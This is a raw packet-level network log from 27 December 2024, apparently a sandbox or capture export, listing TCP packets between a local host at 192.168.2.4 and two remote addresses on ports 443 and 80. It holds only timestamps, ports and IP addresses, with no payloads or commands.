Dec 27, 2024 08:52:32.925700903 CET	49735	443	192.168.2.4	34.226.108.155
Dec 27, 2024 08:52:33.203073978 CET	443	49735	34.226.108.155	192.168.2.4
Dec 27, 2024 08:52:33.203159094 CET	443	49735	34.226.108.155	192.168.2.4
Dec 27, 2024 08:52:33.203207970 CET	49735	443	192.168.2.4	34.226.108.155
Dec 27, 2024 08:52:33.204138994 CET	49735	443	192.168.2.4	34.226.108.155
Dec 27, 2024 08:52:33.204159021 CET	443	49735	34.226.108.155	192.168.2.4
Dec 27, 2024 08:52:44.234288931 CET	49737	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:52:44.354072094 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:44.354188919 CET	49737	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:52:44.361288071 CET	49737	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:52:44.481028080 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:44.481045008 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:44.481065035 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:44.481075048 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:44.481105089 CET	49737	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:52:44.481134892 CET	49737	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:52:44.481136084 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:44.481146097 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:44.481187105 CET	49737	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:52:44.481231928 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:44.481273890 CET	49737	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:52:44.519907951 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:44.519922972 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:44.519984007 CET	49737	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:52:44.520011902 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:44.520066977 CET	49737	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:52:44.600697994 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:44.600713968 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:44.600764990 CET	49737	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:52:44.600795984 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:44.600801945 CET	49737	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:52:44.600805998 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:44.600837946 CET	49737	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:52:44.600843906 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:44.600857019 CET	49737	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:52:44.600871086 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:44.600878000 CET	49737	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:52:44.600925922 CET	49737	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:52:44.639729977 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:44.639827013 CET	49737	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:52:44.683820963 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:44.683902979 CET	49737	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:52:44.759578943 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:44.759665012 CET	49737	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:52:44.799804926 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:44.800038099 CET	49737	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:52:44.843820095 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:44.955791950 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:44.955867052 CET	49737	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:52:45.195810080 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.195874929 CET	49737	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:52:45.341041088 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.341304064 CET	49737	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:52:45.341373920 CET	49737	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:52:45.463088989 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.463107109 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.463119030 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.463188887 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.463201046 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.463210106 CET	49737	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:52:45.463243008 CET	49737	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:52:45.463270903 CET	49737	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:52:45.463342905 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.463354111 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.463365078 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.463404894 CET	49737	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:52:45.463423014 CET	49737	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:52:45.463444948 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.463455915 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.463466883 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.463485003 CET	49737	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:52:45.463511944 CET	49737	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:52:45.463599920 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.463609934 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.463659048 CET	49737	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:52:45.463748932 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.463759899 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.463771105 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.463799953 CET	49737	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:52:45.463907957 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.463920116 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.464169025 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.464179039 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.464514017 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.464526892 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.464658976 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.464679956 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.464818001 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.464828014 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.464977980 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.464987993 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.465001106 CET	49737	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:52:45.465049982 CET	49737	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:52:45.465140104 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.465151072 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.465193033 CET	49737	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:52:45.465655088 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.465666056 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.465707064 CET	49737	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:52:45.507813931 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.507972002 CET	49737	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:52:45.584717035 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.584733009 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.584814072 CET	49737	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:52:45.587110996 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.587122917 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.587132931 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.587141991 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.587182999 CET	49737	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:52:45.588690996 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.591562033 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.591573954 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.591583967 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.591593027 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.591603041 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.592639923 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.593542099 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.593554020 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.593564034 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.593573093 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.594490051 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.594501019 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.594510078 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.594522953 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.594533920 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.594913006 CET	49737	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:52:45.595767975 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.595791101 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.595799923 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.595808983 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.595823050 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.595827103 CET	49737	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:52:45.595879078 CET	49737	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:52:45.597466946 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.597477913 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.597489119 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.597497940 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.597507954 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.597521067 CET	49737	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:52:45.597578049 CET	49737	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:52:45.599684000 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.599704027 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.599714994 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.599724054 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.600193977 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.600204945 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.600214005 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.600225925 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.600234985 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.601582050 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.601593971 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.601603985 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.601614952 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.602673054 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.602684021 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.602693081 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.602703094 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.602714062 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.602910042 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.602926016 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.602935076 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.602945089 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.602955103 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.602966070 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.602973938 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.603138924 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.603147984 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.603158951 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.603171110 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.603179932 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.603189945 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.603199005 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.605082989 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.628953934 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.704621077 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.704639912 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.704651117 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.704662085 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.707406998 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.707420111 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.707431078 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.707813978 CET	49737	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:52:45.707881927 CET	49737	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:52:45.715143919 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.715162039 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.715172052 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.715182066 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.715229988 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.715240955 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.715250969 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.715260029 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.715303898 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.715325117 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.715542078 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.715552092 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.715562105 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.715565920 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.715579033 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.715590954 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.715672016 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.715681076 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.715903044 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.715914965 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.715924978 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.715935946 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.715946913 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.715956926 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.715966940 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.716044903 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.716053963 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.716058016 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.716092110 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.716101885 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.716151953 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.716192961 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.716202974 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.716501951 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.716511011 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.716520071 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.716528893 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.716538906 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.716548920 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.716559887 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.716571093 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.716581106 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.716589928 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.716602087 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.716634989 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.716644049 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.716989994 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.717078924 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.717222929 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.717231989 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.717241049 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.717251062 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.717291117 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.717303991 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.717616081 CET	49737	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:52:45.717680931 CET	49737	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:52:45.827755928 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.827773094 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.827784061 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.827792883 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.827797890 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.827801943 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.827816010 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.827826977 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.827868938 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.827877998 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.828097105 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.828107119 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.828116894 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.828126907 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.828139067 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.828147888 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.828299046 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.828310966 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.828320026 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.828331947 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.828349113 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.828370094 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.828433037 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.828444004 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.828526020 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.828943014 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.828953981 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.828963041 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.828979969 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.828989983 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.828999043 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.829137087 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.829145908 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.829155922 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.829166889 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.829175949 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.829185963 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.829195976 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.829350948 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.829360008 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.829370022 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.829380035 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.829387903 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.829406023 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.829478025 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.829487085 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.829497099 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.829545975 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.829612970 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.829648972 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.829658031 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.829731941 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.829742908 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.829792023 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.830051899 CET	49737	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:52:45.837378025 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.837390900 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.837409973 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.837419033 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.837471008 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.837481022 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.837527990 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.837538958 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.837718964 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.837729931 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.837769032 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.837778091 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.837882996 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.837893009 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.838006020 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.838046074 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.838054895 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.838128090 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.838140965 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.838144064 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.838351011 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.838361025 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.838368893 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.838377953 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.838471889 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.838483095 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.838495016 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.838519096 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.838654041 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.838663101 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.838671923 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.838681936 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.838757992 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.838768005 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.838814020 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.838824987 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.838906050 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.838915110 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.839073896 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.839085102 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.839092970 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.839102983 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.839162111 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.839171886 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.839346886 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.839355946 CET	80	49737	185.121.15.192	192.168.2.4
